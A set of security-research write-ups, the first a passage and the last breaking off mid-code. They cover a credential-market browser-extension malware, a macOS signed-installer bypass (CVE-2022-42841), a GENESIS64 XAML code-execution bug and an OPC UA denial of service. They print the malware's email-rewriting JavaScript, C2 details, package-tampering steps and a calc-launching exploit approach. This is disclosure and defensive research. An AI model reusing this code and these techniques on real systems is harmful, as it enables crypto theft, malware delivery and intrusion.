This downloads a new PowerShell command from the remote host tchk-1[.]com, which gets executed. Further analysis of this host revealed that it is just a proxy (using HAProxy), forwarding requests to other hosts.
Besides v3.bs64 there seem to be other versions as well, such as 5.ps1. In general it seems to do either contain encoded files inline, or download these files separately. These files constitute an unpacked browser extension, which (in case of our victim) gets saved in $localAppData\Default. Then the script iterates over all start menu items, looking for shortcuts to browsers based on Chromium, such as Google Chrome and Brave. It modifies these shortcuts by appending --load-extension=<extension path> to each shortcut such that the just dropped extension gets loaded.
Below you can find the decoded version of v3.bs64, though encoded data has been removed for readability:
We believe the extension that gets dropped and loaded into Chrome is directly related to the market. It poses itself as Google Drive, as can been seen in its manifest.json:
{"offline_enabled":true,"name":"Google Drive","author":"Google inc.","description":"Google Drive: create, share and keep all your stuff in one place.","version":"1.8.7","icons":{"128":"ico.png"},"permissions":["scripting","webNavigation","system.cpu","system.display","system.storage","system.memory","management","storage","cookies","notifications","tabs","history","webRequest","declarativeNetRequest","alarms"],"manifest_version":3,"background":{"service_worker":"./src/background.js","type":"module"},"host_permissions":["<all_urls>"],"content_scripts":[{"matches":["<all_urls>"],"all_frames":true,"js":["src/content/main.js","src/mails/gmail.js","src/mails/hotmail.js","src/mails/yahoo.js"],"run_at":"document_start"}],"declarative_net_request":{"rule_resources":[{"id":"disable-csp","enabled":false,"path":"rules.json"}]}}
It injects several content scripts and it declares some rewrite rules that disable the Content Security Policy. The extension itself consists of multiple JavaScript files, for which no effort was made to obfuscate them. Letβs look a little closer to its features. Below you can see a file listing of the extension, which already paints a picture of what to expect:
In a later version of the extension we analysed, this reference was removed.
Command and Control
The first thing we noticed was how it determines its C2 server. For this it relied on monitoring outgoing transactions from a single Bitcoin address (bc1qtms60m4fxhp5v229kfxwd3xruu48c4a0tqwafu), using the JSON API of blockchain.info. This address has made a single transaction, to a legacy Bitcoin address 1C56HRwPBaatfeUPEYZUCH4h53CoDczGyF. This address can be Base58 decoded, resulting in the domain you-rabbit[.]com. This host is then contacted as the C2 server.
Since this transaction took place on February 6th 2023, prior infections must have used either a different technique, or relied on a different Bitcoin address to determine its C2 host. For this we downloaded a copy of the Bitcoin transaction database from January and decoded all legacy addresses to see if we could find any similar addresses, but this did not result in any matches. This could indicate that this was a new technique they just adopted in the last few months.
Oh no! There is something wrong with my Bitcoin wallet
One of the things the extensions monitors for is emails you might receive from various crypto exchanges. If so, it rewrites the email, to make them look less suspicious. For example, changing an email about a withdrawal into an email about a new sign-in:
if(window.location.href.indexOf('mail.google')>-1){constbinance=()=>{letitems=$(document).find(':contains("Withdrawal Requested")').filter(function(){return$(this).children().length===0;})for(constitemofitems){$(item).text(`[Binance] Authorize New Device`)}items=$(document).find('span:contains("Memo:")')for(constitemofitems){$(item).html(`<span class="Zt"> - </span>Authorize New Device You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confi.`)}items=$($(document).find('div:contains("Memo:")').filter(function(){return$(this).children().length===0;})[0]).parents('.ii')for(constitemofitems){constcode=$($(item).find('div[style*="font-size:20px"]')[1]).find('div').text()$(item).html('...')}}...}
They have support for Gmail, Hotmail/Outlook and Yahoo and seem to monitor emails from Binance, Bybit, Huobi, Okx, Kraken, KuCoin and Bittrex.
Since they donβt actually check for the domain name, but rather if e.g. βmail.googleβ is present somewhere in the URL, we can use this to detect if an user is infected with this extension:
<scripttype="text/javascript">if(window.location.href.indexOf("mail.google+outlook.live+yahoo")===-1){window.location.href=window.location.href+"#scan=mail.google+outlook.live+yahoo";}setTimeout(functionanalyze(){varchecks=[];// The + is needed to avoid this element itself being modified!
checks.push(document.getElementById("binance").innerText!=="Withdrawal "+"Requested");checks.push(document.getElementById("huobi").innerText!=="ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΠ΅ "+"Π·Π°ΠΏΡΠΎΡ Π½Π° Π²ΡΠ²ΠΎΠ΄ ΡΡΠ΅Π΄ΡΡΠ²");checks.push(document.getElementById("okx").innerText!=="Verification "+"Code Of Withdrawal");checks.push(document.getElementById("kraken").innerText!=="Confirm "+"your new withdrawal address");checks.push(document.getElementById("kucoin").innerText!=="KuCoin "+"Verification Code");checks.push(document.getElementById("bitget").innerText!=="Add "+"withdrawal address");checks.push(document.getElementById("bittrex").innerText!=="Please "+"Confirm Your Withdrawal");varfound=0;for(iinchecks){if(checks[i])found+=1;}if(found===0){document.getElementById('result').innerText="Good news! The malicious browser extension was not detected.";}else{document.getElementById('result').innerHTML="Bad news! We also detected this extension on your system. We would advice you to go to the website of the <a href='https://politie.nl/checkyourhack'>Dutch police</a>, where they can assist you further.";}},2000)</script><pstyle="display: none;"id="binance">Withdrawal Requested</p><pstyle="display: none;"id="huobi">ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΠ΅ Π·Π°ΠΏΡΠΎΡ Π½Π° Π²ΡΠ²ΠΎΠ΄ ΡΡΠ΅Π΄ΡΡΠ²</p><pstyle="display: none;"id="okx">Verification Code Of Withdrawal</p><pstyle="display: none;"id="kraken">Confirm your new withdrawal address</p><pstyle="display: none;"id="kucoin">KuCoin Verification Code</p><spanstyle="display: none;"id="bitget">Add withdrawal address</span><pstyle="display: none;"id="bittrex">Please Confirm Your Withdrawal</p><divid="result">Checks still running...</div>
This script is embedded on this page, and the result is:
Deputizing the victimβs browser - request proxying
Another interesting feature of the malicious browser extension is the ability to proxy HTTP requests through the victimβs browser. This feature can be enabled at any time by the C2 server using the aptly-named proxy command (more on the other supported commands later). In addition, the feature can also be enabled during registration with the C2 server if isEnabledProxy is set to true in the JSON-formatted response of the registration endpoint at https://{c2.domain}/api/machine/init.
When enabled, the proxy feature attempts to set up a WebSocket connection channel to another C2 server which is relayed by the main C2 server in the response to https://{c2.domain}/api/machine/settings on port 4343. Once set up, the proxy submodule will wait for commands from its associated C2 server, which can be one of:
HTTP_REQUEST request a URL through the victimβs browsers, adding the victimβs own cookies using the fetch() API
AUTH provide the uuid of the malicious extensionβs instance
GET_COOKIES get a copy of all the cookies
Requests made by the C2 server through the HTTP_REQUEST command occur within the context of the extension, making them invisible to victims. We were able to test this specific subset of the functionality by creating our own set of emulated C2 servers, so we could see the proxy functionality in action asking the extension to make a request to http://localhost:8080/test2:
As a result, the extension indeed issued a request to http://localhost:8080/test2:
Despite the existence of this proxy feature, its intended use case remains a mystery to us. From the point of view of features available to market users, the buyersβ extension - which is further elaborated on later in this writeup - makes no reference to this feature. There is the possibility to set a SOCKS5 proxy in the extension settings page, but that does not seem related to the malicious extensionβs proxy feature. Additionally, the user manual only mentions the SOCKS5 proxy feature.
It may be the case that proxying through the victimβs machine is possible for bot buyers, perhaps through a SOCKS5 interface exposed by the Danabot-like malware thatβs deployed as part of the infection chain. However, we do not have enough information to make any definitive conclusions on whether these features are available to buyers or not.
Other functionality
Besides rewriting emails and proxying requests, the C2 server can send the following commands to the victim:
extension enable or disable a certain browser extension
info get information about the victimβs machine (e.g. WebGL machine details)
push send a push notification
cookies get a copy of all cookies
screenshot send back a screenshot of the page currently open in the browser
url open a URL in the browser
current_url send back the URL of the current tab
history send back the browser history
injects download a new set of rules from the server, which specify extra JavaScript to execute on certain domains
settings get a new settings object from the server; for example links it should grab
Analysis of the browser (extension) for buyers
Buyers on the market get access to a Chromium extension (as .crx file) and a browser (based on ungoogled-chromium) with the extension preinstalled. This extension can easily import bought fingerprints and cookies.
General functionality
The extension, once activated, allows buyers to automatically import bought fingerprints and cookies. Furthermore, it allows for the setup of an SOCKS5 based proxy. The plugin can been seen in action in the GIF below.
Analyzing the source code
This extension is heavily obfuscated, making it difficult to determine exactly how it works and what features it offers. We combined the analysis of the source code with dynamic analysis in an isolated VM.
The extension requires a large list of permissions, for example, allowing it full access to all visited pages. The full list of permissions is:
This list contains a number permissions for which it is not clear what functionality they are intended for, such as desktopCapture, system.cpu and power.
When the extension is installed, users need to activate it using an βactivation codeβ. When a code is entered, the browser sends a POST request to the following URL:
https://sync.approveconnects[.]com/security
If this request fails, it tries again with the following URL:
https://sync.gsconnects[.]com/security
This request contains a multipart body with 3 variables: a, v and i. Each field is encrypted and is included as binary data in the multipart body. The encryption of the activation key (the field a) works as follows:
The activation key is encoded as a JSON string (enclosed in double quotes).
This string is URL-encoded (replacing the double quotes with %22, etc.).
This result is then compressed using deflate (the compression algorithm used by zlib, but without a zlib header).
Then, a key and IV are generated. This uses the OpenSSL EVP_BytesToKey KDF with a random 8-character salt and the hard-coded password liauyd(o*!&@#ijKj@!#asdg2134.
The compressed data is encrypted using AES-CBC with the generated key and IV and with PKCS7 padding.
The data submitted in the request is the random salt followed by the cipher text.
The parameters v and i are encrypted in a similar way, but with a different password. The password is generated by taking the activation key, swapping the case of all letters (replacing lowercase characters with uppercase characters and vice versa) and appending the string asdg2134.
The parameter v contains the version number of the plugin (currently 7.2), as a JSON dictionary:
{"v":"7.2"}
The parameter i contains certain fingerprinting data of the browser and extension, such as the user agent, OS details and a list of the removable drives on the userβs machine. We donβt see any way this could be relevant for the extension, so this is likely just included to monitor and track the buyers:
{"p":{"p":{"a":"aarch64","b":"","c":"","d":6},"m":{"a":4113801216},"s":{"a":{"c":[],"a":["536870912|777db833-9d2e-40e5-a1cb-75b26827b847|/boot/efi|/boot/efi","1048576|7ff0d82f-ee43-4c1d-85a4-a5af0aa1aab5|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee","32797360128|0f25215a-4b5c-4569-ab5a-552bc703bd94|/|/"],"b":[]}},"i":{"a":{"c":[],"a":["536870912|777db833-9d2e-40e5-a1cb-75b26827b847|/boot/efi|/boot/efi","1048576|7ff0d82f-ee43-4c1d-85a4-a5af0aa1aab5|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee","32797360128|0f25215a-4b5c-4569-ab5a-552bc703bd94|/|/"],"b":[]}}},"j":{"c":"9a3bd3e8cebf17110f689f58a4a1f43e","w":"6c14da109e294d1e8155be8aa4b1ce8e","s":"Chrome 111","p":{"ua":"Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36","browser":{"name":"Chrome","version":"111.0.0.0","major":"111"},"engine":{"version":"537.36","name":"WebKit"},"os":{"name":"Linux","version":"aarch64"},"device":{},"cpu":{}},"a":"ad449aba7595468941c6d3b6aad54a4fc76797aa","t":{"s":0,"b":1}}}
The server can reverse this process by first decrypting the activation code, generating the same key and IV using the salt. Then the activation code can be used to decrypt the v and i fields.
Jumping through all these hoops does gives us an βactivatedβ extension:
At regular intervals, the extension will submit its activation code again (specified by renew_interval/renew_enabled). This request contains the same variables as the first activation request with 3 additional fields: b, e and d. The exact meaning of these fields has not yet been determined.
While the code is obfuscated, the settings reveal some of its functionality. We managed to obtain the following configuration object from the extension:
The URL for the activation is constructed by taking a value from the links_domain_sync and appending the link_path_sync path.
Note that this extension had just been installed and not activated, so the values when in use will be different. It looks likely that the link_path_bots endpoint is used to automatically retrieve the list of cookies and online fingerprints that the buyer has bought. The proxy and selected_fp fields would be filled with settings if the extension was in use.
The configuration can also be obtained from disk from files at the following path:
This is a LevelDB database, which appears to also keep a number of older versions of the configuration.
The extension contains functionality (and has the permission) to configure a SOCKS5 proxy. In the victimβs extension, a method for proxying HTTPS requests through the victimβs browser was found that uses WebSockets. The functionality to send requests over such a WebSocket connection was not found in the buyerβs extension, although due to the obfuscation this is not fully certain. It is still an open question on whether proxying through the victimβs machine directly was a feature offered by the market, or whether the buyers only used their own SOCKS5 proxies.
Fingerprinting buyers
The extension registers an event handler on all webpages. The content script that gets added to each visited webpage by the extension registers an event handler for a custom event named hammilton. This appears to be a method for communicating with the extension from a webpage, as it will pass the result back to the page. When this event is received by the content script, it sends a message to the background script, which will send a response back as JavaScript code which is evaluated in the content script:
Therefore, by setting window.bunny.cb[0] to a JavaScript function and sending the event, it is possible to determine if a user has this extension installed by determining if that function is called.
The reason why this is present is not entirely clear to us. However, it does provide us with a nice way of fingerprinting the buyersβ extension.
Taking it one step furtherβ¦
Fingerprinting buyers is already cool of course, but maybe we can take it one step further? For example by exploiting a XSS vulnerability in the extension itself? There is a vulnerability in the method used to communicate back to the webpage. The parameter l in the custom event detail object is used in the response code that is evaluated. This value is used as-is and not escaped before calling eval. By including a single quote character ('), it possible to inject additional JavaScript code that gets executed in the context of the content script.
For example, the following event, sent from the webpage:
Therefore, the console.log(1) is executed by the content script, instead of the page.
Browser extensions use an (invisible) background page which can use all the permissions granted to that extension. This background page does not directly have access to the contents of the visited webpages, but it can inject new JavaScript to run on those pages, called βcontent scriptsβ. Content scripts have access to a specific page and can interact with that pageβs DOM, but use a JavaScript environment that is separate from the pageβs own JavaScript environment. Content scripts do not have all the permissions of the background page, but they do have permission to send messages to the background page and can access the storage of the extension, making them more powerful than the pageβs own JavaScript.
Therefore, one of the things that can be done with by sending messages to the background page is copying the configuration of the plugin. For example:
We have actually included a script in this page which will exploit this precise vulnerability (if you have this extension installed). It first turned off the proxy functionality, and then uploaded your extension configuration to us.
Conclusions
We would like to thank all law enforcement agencies that collaborated on this case, to take this market place down. Weβre glad we could be of any assistance. All findings have been shared with authorities and all malicious files have been reported to the relevant organisations. Hopefully this post can help any future researchers, if this market place ever comes back online.
If you have any followup questions, feel free to reach out.
For reference, these are the files that we investigated (the buyers side is purposely excluded from this list):
Code signing of applications is an essential element of macOS security. Besides signing applications, it is also possible to sign installer packages (.pkg files). During a short review of the xar source code, we found a vulnerability (CVE-2022-42841) that could be used to modify a signed installer package without invalidating its signature. This vulnerability could be abused to bypass Gatekeeper, SIP and under certain conditions elevate privileges to root.
Background
Installer packages are based on xar files with a number of predefined file names. The method for signing installer packages is the same as generating signed xar files, so to start weβll explain how that file format works.
A xar file consists of 3 parts: a fixed length header, a table of contents (TOC) and what is called the βheapβ.
The header contains a number of fields, including the hashing algorithm that is used throughout the file (typically still SHA1) and the size of the TOC.
The TOC is a zlib-compressed XML document. This document lists for each file included in the archive the start address and length where the contents can be found on the heap, starting with 0 for the first byte directly after the TOC. Each file in the archive can be compressed independently by specifying an encoding, so when creating an archive file it is possible to choose the optimal way of storing each file.
For all files, a hash is included in the TOC of both the uncompressed and compressed data, using the hashing algorithm specified in the header.
Even xar files that are not signed have these hashes and so the integrity can be verified when extracting a file.
To verify the integrity of the entire archive, the TOC also lists the location on the heap where a value known as the βTOC hashβ is stored. In practice this is usually at offset 0:
The value stored here must be equal to the hash of the compressed TOC data and this is verified when the archive is opened. The reason this is included on the heap and not in the TOC itself is that this would create a cyclic dependency: adding this value into the TOC would change the TOC and the TOC hash again.
This hash indirectly guarantees the integrity of all files in the archive: for each file, the extracted-checksum in the TOC ensures the integrity of that file. The integrity of the TOC is covered by the TOC hash. This construction has the nice benefit that a single file can be extracted and validated without having to validate the entire archive. This means it is possible to extract files from xar archives without completely reading the archive, or possibly even without completely downloading it.
Signed xar files additionally contain a signature element with a certificate chain in the TOC:
The signature itself is also stored on the heap (for the same cyclic dependency reason). The data used for generating the signature is the TOC hash. This signature therefore ensures the authenticity of all files in the archive.
Interestingly, this design does mean that data on the heap that is not included in any of the ranges can be modified without invalidating the signature. For example, appending more data to a xar file will always keep the TOC hash and signature valid.
The vulnerability
For signed packages, the TOC hash needs to be used for two different checks:
The computed TOC hash needs to be equal to the TOC hash stored on the heap.
The signature and the certificates need to correspond to the TOC hash.
This is implemented in the following locations in the xar source code.
Here, the computed TOC is compared to the value stored on the heap.
/* if TOC specifies a location for the checksum, make sure that
* we read the checksum from there: this is required for an archive
* with a signature, because the signature will be checked against
* the checksum at the specified location <rdar://problem/7041949>
*/constchar*value;uint64_toffset=0;uint64_tlength=0;if(xar_prop_get(XAR_FILE(ret),"checksum/offset",&value)==0){if(value){errno=0;offset=strtoull(value,(char**)NULL,10);if(errno!=0){fprintf(stderr,"checksum/offset missing or invalid!\n");xar_close(ret);returnNULL;}}else{fprintf(stderr,"checksum/offset missing or invalid!\n");xar_close(ret);returnNULL;}}[...]XAR(ret)->heap_offset=xar_get_heap_offset(ret)+offset;if(lseek(XAR(ret)->fd,XAR(ret)->heap_offset,SEEK_SET)==-1){xar_close(ret);returnNULL;}[...]size_ttlen=0;void*toccksum=xar_hash_finish(XAR(ret)->toc_hash_ctx,&tlen);XAR(ret)->toc_hash_ctx=NULL;if(length!=tlen){free(toccksum);xar_close(ret);returnNULL;}// Store our toc hash upon archive open, so callers can determine if it
// has changed or been tampered with after archive open
XAR(ret)->toc_hash=malloc(tlen);memcpy(XAR(ret)->toc_hash,toccksum,tlen);XAR(ret)->toc_hash_size=tlen;void*cval=calloc(1,tlen);if(!cval){free(toccksum);xar_close(ret);returnNULL;}ssize_tr=xar_read_fd(XAR(ret)->fd,cval,tlen);[...]if(memcmp(cval,toccksum,tlen)!=0){fprintf(stderr,"Checksums do not match!\n");free(toccksum);free(cval);xar_close(ret);returnNULL;}
This first retrieves the attribute checksum attribute from the XML document as a const char *value. Then, strtoull converts it to an unsigned 64-bit integer and it gets stored in the offset variable.
uint32_toffset=0;xar_tx=NULL;constchar*value;// xar 1.6 fails this method if any of data, length, signed_data, signed_length are NULL
// within OS X we use this method to get combinations of signature, signed data, or signed_offset,
// so this method checks and sets these out values independently
if(!sig)return-1;x=XAR_SIGNATURE(sig)->x;/* Get the checksum, to be used for signing. If we support multiple checksums
in the future, all checksums should be retrieved */if(length){if(0==xar_prop_get_expect_notnull(XAR_FILE(x),"checksum/size",&value)){*length=strtoull(value,(char**)NULL,10);}if(0==xar_prop_get_expect_notnull(XAR_FILE(x),"checksum/offset",&value)){offset=strtoull(value,(char**)NULL,10);}if(data){*data=malloc(sizeof(char)*(*length));// This function will either read all of length or return -1. Check and bubble up.
if(_xar_signature_read_from_heap(x,offset,*length,*data)!=0)return-1;}}
Note here the tiny but very important difference: while the first comparison was storing the offset in uint64_t offset (a 64-bit unsigned integer), here it uses an uint32_t offset (a 32-bit unsigned integer). This difference means that if the offset is outside of the range that can be stored in a 32-bit value, the two checks can use a different heap offset. For example, if the offset is equal to 0x1 0000 0000, then the integrity hash will be read from 0x1 0000 0000, while the signature hash will be read from offset 0x0 on the heap.
Thus, it was possible to modify a xar file without invalidating its signature as follows:
Take a correctly signed xar file and parse the TOC.
Change the checksum offset value to 4294967296 (and make any other changes you want to the included files, like adding a malicious preinstall script or replacing the installation check script).
Write the modified TOC back to the file and compute the new TOC hash.
Add padding until the heap is exactly 4294967296 bytes (4 GiB) in size.1
Place the new TOC hash at heap offset 4294967296, leaving the original TOC hash at heap offset 0.
When this package is verified, the integrity check will use the hash at offset 4294967296, while the signature verification will read it from offset 0. The integrity check will pass, because the new TOC hash is placed there, while the signature will also pass, because the signatures still correspond to the old TOC hash.
Exploitation
This was quite an interesting bug that could be applied in a number of different ways, with different requirements and impact.
Bypassing SIPβs filesystem restrictions
When a package is installed that is signed by Apple, installation works a little differently compared to an installation of a package by signed by anyone else. These installations are performed by system_installd, instead of installd, which has an entitlement granting it access to all files normally protected by SIP:
This makes sense, as updates from Apple often need to write to protected locations, like replacing components of the OS.
Abusing this vulnerability to modify a package signed by Apple would make it possible to read and write to all those SIP protected files. This could be used to, for example:
Grant an application TCC permissions, like access to the webcam, microphone, etc.
Read data from a data vault, such as the userβs Mail and Safari data.
Load a kernel extension without user approval on Intel macs (although the kernel extension would need to be properly signed).
This could be used to modify a package that a user installs manually, although that requires convincing the user. Another option would be a process that has already obtained root privileges using this to gain access to SIP protected locations, as the root user is allowed to use the install command to perform the installation of new packages.
Note that any files on the Signed System Volume (SSV) could not be modified this way, as that disk is mounted read-only.
Bypassing Gatekeeper
After downloading a .pkg file, Gatekeeper will perform a notarization check, similar to that for applications. It takes the hash of the package and submits it to Apple to check that it has been scanned for malware. When a user opens a package that was not notarized, they receive a scary warning, making it quite difficult to trick a user into installing a package containing malware.
The method for querying Appleβs server for the notarization status of a package uses the same function to obtain the TOC hash as was used for the signature verification. Therefore, a modified package will still be considered notarized if the original was. This means that if a user downloads such a modified package file, they will not be warned in any way.
Asking users to download a 4 GiB .pkg sounds like a challenge. Even if users donβt notice the unusual size, the fact that they need to wait a few minutes for the download to finish could allow them to spot that something is off about the webpage offering the download. Luckily, the padding in the package can be anything, so when using the same byte for all the padding, the resulting file compresses very well. By placing the package on a compressed disk image, the resulting .dmg file can be only a few hundred kilobytes. Distributing an application in this way is also not unusual for macOS. The increase in size also does not increase the time required for verify the package, as mentioned only the integrity of data on the heap that is actually in use is checked.
Combining this with the previous vulnerability would allow for some very powerful malware: it would be possible to create a manipulated installer package that appears completely legitimate and triggers no warnings when installed. After the user installs it, the malware immediately gains complete access to all SIP-protected data on the system.
Elevating privileges
We did not find a way to abuse this vulnerability for privilege escalation on an out-of-the-box installation of macOS. However, when combined with certain third-party software, we did find a method.
Some applications try to make sure that their application can update itself automatically, even if the current user is not an admin user. Normally, non-admin users are not allowed to make changes in /Applications, so they can not update any existing applications. If the admin never logs in, this could mean that users run known vulnerable software indefinitely.
To solve that, some applications include a privileged helper tool to perform the upgrade. This is a tool that runs as root and has the single purpose of installing updates for the existing application. Often, the application itself handles the checking for updates and downloading a new update file, the tool only performs the actual installation.
To make this secure, there are two important checks:
A request to install an update must originate from the associated application.
The update file must be authentic (and not a downgrade).
The format of the update file varies between the applications that implement this, but using .pkg files is common. If this method is used, then it may be possible to swap out an update package with a modified version. For example, by using a race condition to change the package in between the download by the application and the actual installation by the privileged helper tool. This means that the package would be installed automatically, allowing privilege escalation to root.
In fact, this vulnerability was originally discovered when investigating the privileged helper tool used by Zoom. In the DEF CON 30 talk βYouβre Muted Rootedβ by Patrick Wardle he described a method for bypassing the signature verification performed by Zoom. This was addressed by switching to the libxar functions for verifying a package signature.
Non-impact
During our research to investigate the full impact of this vulnerability, we also attempted to modify macOS system updates. These also use .pkg files and verify the TOC hash, however, they compare it to the computed TOC hash. Therefore, replacing a system update with a malicious file is not possible.
This issue also does not affect iOS, as xar files are not used there anywhere as far as we could tell. While signed xar files have been used for Safari extensions in the past, they now use app extensions, so we could also not identify any impact there.
Demo
The following video demonstrates the use of this vulnerability to bypass Gatekeeper and SIP. As can be seen, it creates a new file in /private/var/db/SystemPolicyConfiguration/, a directory normally protected by SIP.
(Note that the installer states that the installation has failed, but the exploit already ran using a pre-install script. This is only the case for the demo and could be avoided for a real attack.)
The fix
This was fixed by Apple with a 2 character fix: changing uint32_t to uint64_t in macOS 13.1.
What is interesting about this vulnerability is that there was a similar issue in 2010: CVE-2010-0055. In that version, one of the checks assumed that the TOC hash offset was always 0 and the other used the value read from the TOC. Vulnerabilities that are variants of fixed issues and regressions that re-introduce a vulnerability are sadly common, but to see a vulnerability similar to a 12 year old vulnerability is still surprising. Especially considering that a small change to this library could prevent all similar vulnerabilities that lead to the same result.
A comment in the code snippet above notes the following:
Store our toc hash upon archive open, so callers can determine if it has changed or been tampered with after archive open
Using this stored value instead of reading it from the file again would have made this vulnerability, and any similar variants, impossible to exploit as the value would not be read from the heap twice.
This write-up is part 5 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in ICONICS GENESIS64 (CVE-2022-33315).
We successfully demonstrated this vulnerability during the competition, however it turned out that the vendor was already aware of this vulnerability. As this was also one of the most shallow bugs we used during the competition, this was something we already anticipated. The bug was originally reported by Zymo Security and disclosed as https://www.zerodayinitiative.com/advisories/ZDI-22-1043/. Luckily, this was the only bug collision we had during this competition.
A 3rd bug collision on Day 1. The team @sector7_nl successfully popped calc, but the bug they used had been disclosed earlier in the competition. They still win $5,000 and 5 Master of Pwn points. #Pwn2Ownpic.twitter.com/HCv7DSspwF
GENESIS64 was one of the two targets in the Control Server category. It is more of a software suite than a single application and can be used to design and visualize entire ICS environments. From dashboards and control screens to visualizing entire factory floors in 3D.
Save files
For this category it was acceptable to achieve code execution by opening a file within the target on the contest laptop. The files must be file types that are handled by default by the target application. So we opened up one of the applications that came with the GENESIS64 installer. We choose GraphWorX64 at random (it is normally used to design HMI/SCADA control screens), and saved an empty file. When looking at the empty project file, we can see it is stored as a WPF XAML file:
Using XAML it is possible to directly instantiate objects of arbitrary types. This makes it unsuitable for loading untrusted input files. We quote a small piece of the relevant manual (System.Windows.Markup.XamlReader) from Microsoft regarding the loading of untrusted XAML files:
Code Access Security, Loose XAML, and XamlReader
XAML is a markup language that directly represents object instantiation and execution. Therefore, elements created in XAML have the same ability to interact with system resources (network access, file system IO, for example) as the equivalent generated code does.
β¦
The implications of these statements for XamlReader is that your application design must make trust decisions about the XAML you decide to load. If you are loading XAML that is not trusted, consider implementing your own sandboxing technique for how you load the resulting object graph.
Unfortunately GENESIS64 has no such sandboxing technique in place, so instantiating arbitrary objects is trivial. The actual decoding of this file seems to happen in Components/IcoWPF.dll, using a wrapper around XamlReader().
Our exploit
In the end we used the following XAML file for instantiating a Process object and providing it the necessary parameters for starting our beloved calculator. This calls the method Start using the parameters cmd.exe /c calc.exe:
You can see the exploit in action in the screen recording below.
Thoughts
To fully mitigate this vulnerability, it would be advised to use a different file format. However, this would also mean that old project files would be unable to load. ICONICS settled for a blocklist approach, with the release of version 10.97.2. In that version, the XAML file is pre-parsed before being passed to XamlReader() and certain classes are excluded from deserialization.
We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!
This write-up is part 4 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Denial-of-Service in the Unified Automation OPC UA C++ Demo Server (CVE-2022-37013).
Confirmed! The team from @sector7_nl leveraged an infinite loop condition to create a DoS against the Unified Automation C++ Demo Server. They earn $5,000 and 5 points towards Master of Pwn. #Pwn2Own#P2OMiami
OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.
At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different βpayloadβ options:
Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
Remote code execution. Being able to take over the server.
Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.
If an client connects with the server it first needs to authenticate using a client certificate. We call this the trusted application check. The protocol also supports user authentication, using either username/password combination or certificates, but this is only after the client application itself has been authenticated. Although OPC UA uses the same X.509 certificates as TLS, the protocol itself is not based on TLS.
For the OPC UA server category we focused on bypassing the trusted application check, as this would gain us the most points. We did not look at remote code execution vulnerabilities. A trusted application means the application can authenticate with a valid certificate. This meant we only had to audit the certificate verification function, which is a very limited scope. We looked at all applications in scope, and in the end did find such a vulnerability in the OPC Foundation OPC UA .NET Standard (you can find the write-up for this vulnerability here).
In the Unified Automation C++ Demo Server we couldnβt find a way to bypass the check, however we did find a reliable Denial-of-Service while reviewing this. Since this Denial-of-Service is in the certificate verification function, it means we can trigger this vulnerability before authentication. In the ICS world where everything revolves around availability, having a vulnerability that allows the attacker to reliably disable a central component is less than ideal.
Certificate verification
Verifying the certificate for a client is handled by the function OpcUa_P_OpenSSL_PKI_ValidateCertificate() in uastack.dll. This function will call OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(), which will check if the certificate or any of its issuers are already explicitly trusted. It will do so by walking the certificate chain and checking each certificate if it is equal to a trusted certificate; meaning its SHA1 hash is equal to that of a file under the pki/trusted/certs folder on the server.
The source code for this function seems to be similar to some code from the OPC Foundation, which can be found on GitHub:
staticOpcUa_StatusCodeOpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(OpcUa_P_OpenSSL_CertificateStore*a_pStore,X509_STORE_CTX*a_pX509Context,X509*a_pX509Certificate,OpcUa_Boolean*a_pExplicitlyTrusted){X509*x=a_pX509Certificate;X509*xtmp=OpcUa_Null;intiResult=0;OpcUa_UInt32jj=0;OpcUa_ByteStringtBuffer;OpcUa_Byte*pPosition=OpcUa_Null;OpcUa_P_OpenSSL_CertificateThumbprinttThumbprint;OpcUa_InitializeStatus(OpcUa_Module_P_OpenSSL,"CertificateStore_IsExplicitlyTrusted");OpcUa_ReturnErrorIfArgumentNull(a_pStore);OpcUa_ReturnErrorIfArgumentNull(a_pX509Context);OpcUa_ReturnErrorIfArgumentNull(a_pX509Certificate);OpcUa_ReturnErrorIfArgumentNull(a_pExplicitlyTrusted);OpcUa_P_ByteString_Initialize(&tBuffer);*a_pExplicitlyTrusted=OpcUa_False;/* follow the trust chain. */while(!*a_pExplicitlyTrusted){/* need to convert to DER encoded certificate. */intiLength=i2d_X509(x,NULL);if(iLength>tBuffer.Length){tBuffer.Length=iLength;tBuffer.Data=OpcUa_P_Memory_ReAlloc(tBuffer.Data,iLength);OpcUa_GotoErrorIfAllocFailed(tBuffer.Data);}pPosition=tBuffer.Data;iResult=i2d_X509((X509*)x,&pPosition);if(iResult<=0){OpcUa_GotoErrorWithStatus(OpcUa_BadEncodingError);}/* compute the hash */SHA1(tBuffer.Data,iLength,tThumbprint.Data);/* check for thumbprint in explicit trust list. */for(jj=0;jj<a_pStore->ExplicitTrustListCount;jj++){if(OpcUa_MemCmp(a_pStore->ExplicitTrustList[jj].Data,tThumbprint.Data,SHA_DIGEST_LENGTH)==0){*a_pExplicitlyTrusted=OpcUa_True;break;}}if(*a_pExplicitlyTrusted){break;}/* end of chain if self signed. */if(X509_STORE_CTX_get_check_issued(a_pX509Context)(a_pX509Context,x,x)){break;}/* look in the store for the issuer. */iResult=X509_STORE_CTX_get_get_issuer(a_pX509Context)(&xtmp,a_pX509Context,x);if(iResult==0){break;}/* oops - unexpected error */if(iResult<0){OpcUa_GotoErrorWithStatus(OpcUa_Bad);}/* goto next link in chain. 